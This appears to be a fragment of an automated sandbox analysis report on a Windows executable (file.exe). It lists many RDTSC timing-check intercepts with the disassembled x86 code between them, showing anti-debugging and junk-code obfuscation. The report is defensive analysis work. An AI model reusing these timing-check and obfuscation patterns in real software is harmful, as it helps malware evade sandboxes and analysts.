                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596AB7 second address: 596ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596ABB second address: 596AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F2398D03469h 0x0000000c popad 0x0000000d push eax 0x0000000e push edi 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596AE2 second address: 596B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F239852C05Ah 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F239852C05Eh 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a ja 00007F239852C05Ch 0x00000020 pop eax 0x00000021 lea ebx, dword ptr [ebp+124588D4h] 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007F239852C058h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 xchg eax, ebx 0x00000042 push edi 0x00000043 push ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596BE0 second address: 596C0A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2398D03458h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007F2398D03466h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596C0A second address: 596C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop ecx 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596C1B second address: 596C1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596C1F second address: 596C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F239852C068h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596C3F second address: 596C9C instructions: 0x00000000 rdtsc 0x00000002 js 00007F2398D03456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F2398D0345Fh 0x00000014 pop eax 0x00000015 movsx edx, cx 0x00000018 push 00000003h 0x0000001a xor dword ptr [ebp+122D22E6h], ebx 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007F2398D03458h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c push 00000003h 0x0000003e mov edx, edi 0x00000040 call 00007F2398D03459h 0x00000045 push eax 0x00000046 push edx 0x00000047 push ecx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596C9C second address: 596CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596CA1 second address: 596CCD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a jmp 00007F2398D03468h 0x0000000f pop ebx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596CCD second address: 596CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596E2D second address: 596E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596E31 second address: 596E37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596E37 second address: 596E66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D03460h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e mov dx, E7BAh 0x00000012 mov di, E700h 0x00000016 push 09D9EBE9h 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e ja 00007F2398D03456h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596E66 second address: 596F20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C067h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F239852C060h 0x0000000e popad 0x0000000f xor dword ptr [esp], 09D9EB69h 0x00000016 mov esi, 14BA0E3Bh 0x0000001b push 00000003h 0x0000001d or ecx, dword ptr [ebp+122D3751h] 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 jbe 00007F239852C058h 0x0000002c pushad 0x0000002d popad 0x0000002e pop ecx 0x0000002f push 00000003h 0x00000031 call 00007F239852C05Dh 0x00000036 jc 00007F239852C056h 0x0000003c pop edx 0x0000003d push 90D23855h 0x00000042 pushad 0x00000043 push esi 0x00000044 jmp 00007F239852C05Eh 0x00000049 pop esi 0x0000004a jmp 00007F239852C066h 0x0000004f popad 0x00000050 add dword ptr [esp], 2F2DC7ABh 0x00000057 lea ebx, dword ptr [ebp+124588E8h] 0x0000005d jmp 00007F239852C05Fh 0x00000062 push edi 0x00000063 movzx esi, ax 0x00000066 pop edi 0x00000067 xchg eax, ebx 0x00000068 jg 00007F239852C060h 0x0000006e pushad 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7BFE second address: 5B7C03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7C03 second address: 5B7C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 jo 00007F239852C05Eh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6068 second address: 5B606D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6457 second address: 5B645B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6579 second address: 5B6588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F2398D0345Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6588 second address: 5B659C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jne 00007F239852C05Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B659C second address: 5B65A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B682A second address: 5B6830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6830 second address: 5B68A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2398D0345Eh 0x00000009 popad 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F2398D03469h 0x00000012 pop edi 0x00000013 jmp 00007F2398D03468h 0x00000018 push ebx 0x00000019 jmp 00007F2398D03461h 0x0000001e pop ebx 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F2398D03463h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B68A3 second address: 5B68AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B68AB second address: 5B68B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F5CF second address: 57F5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F239852C056h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F5DB second address: 57F5E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6E19 second address: 5B6E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B76AE second address: 5B76E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2398D0345Fh 0x00000009 jng 00007F2398D03456h 0x0000000f jc 00007F2398D03456h 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push ebx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ebx 0x0000001c jns 00007F2398D0345Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7822 second address: 5B7828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7828 second address: 5B7833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7833 second address: 5B7837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA626 second address: 5AA651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2398D03456h 0x0000000a pushad 0x0000000b js 00007F2398D03456h 0x00000011 jmp 00007F2398D03464h 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7AD7 second address: 5B7AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F239852C056h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7AE3 second address: 5B7AE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B9304 second address: 5B9326 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C05Eh 0x00000007 jne 00007F239852C056h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F239852C05Eh 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57DAA2 second address: 57DAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BDD08 second address: 5BDD52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C066h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jmp 00007F239852C069h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jnc 00007F239852C056h 0x0000001c popad 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BDD52 second address: 5BDD66 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ecx 0x0000000c jo 00007F2398D0345Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BDF6E second address: 5BDF86 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F239852C056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jc 00007F239852C056h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BDF86 second address: 5BDF90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F2398D03456h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C315A second address: 5C315E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C315E second address: 5C317D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 jmp 00007F2398D0345Eh 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F2398D03456h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C54F3 second address: 5C5503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F239852C05Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5503 second address: 5C5507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5C29 second address: 5C5C2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5C2D second address: 5C5C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5C33 second address: 5C5C4D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F239852C05Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jng 00007F239852C05Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5C4D second address: 5C5C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5C55 second address: 5C5C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C986A second address: 5C9874 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2398D0345Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8FF5 second address: 5C9000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F239852C056h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C9000 second address: 5C9006 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C9006 second address: 5C900A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CAC11 second address: 5CAC16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C900A second address: 5C9024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F239852C05Dh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CAE46 second address: 5CAE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D22E6h], eax 0x0000000f push 00000000h 0x00000011 add dword ptr [ebp+124854E5h], eax 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007F2398D03458h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 stc 0x00000034 push eax 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 push esi 0x00000039 pop esi 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C9024 second address: 5C902A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CAE87 second address: 5CAE8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CB89A second address: 5CB8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CB96C second address: 5CB972 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC3A2 second address: 5CC3BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F239852C069h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC3BF second address: 5CC44B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2398D03456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F2398D03458h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov edi, esi 0x0000002b push 00000000h 0x0000002d mov di, si 0x00000030 mov esi, dword ptr [ebp+122D3729h] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007F2398D03458h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 00000017h 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 mov di, si 0x00000055 pushad 0x00000056 jmp 00007F2398D03465h 0x0000005b mov eax, 0C5A0291h 0x00000060 popad 0x00000061 xchg eax, ebx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F2398D03460h 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC14C second address: 5CC151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC44B second address: 5CC465 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2398D0345Ch 0x00000008 jng 00007F2398D03456h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007F2398D03456h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC465 second address: 5CC46E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CCF30 second address: 5CCF34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CCF34 second address: 5CCF3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CCF3A second address: 5CCF44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F2398D03456h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD827 second address: 5CD831 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F239852C056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2748 second address: 5D274C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD831 second address: 5CD838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D274C second address: 5D2752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CECB second address: 58CECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CECF second address: 58CF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F2398D03460h 0x0000000e jmp 00007F2398D03461h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F2398D03463h 0x0000001c jnl 00007F2398D03456h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CF15 second address: 58CF25 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F239852C056h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CF25 second address: 58CF45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F2398D03466h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CF45 second address: 58CF4F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F239852C056h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D32BE second address: 5D32D3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2398D03456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F2398D03456h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D4EA5 second address: 5D4EAF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F239852C05Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7D16 second address: 5D7D1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7D1C second address: 5D7D42 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F239852C058h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F239852C060h 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F239852C056h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D8C6B second address: 5D8C82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D03463h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7ECA second address: 5D7ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
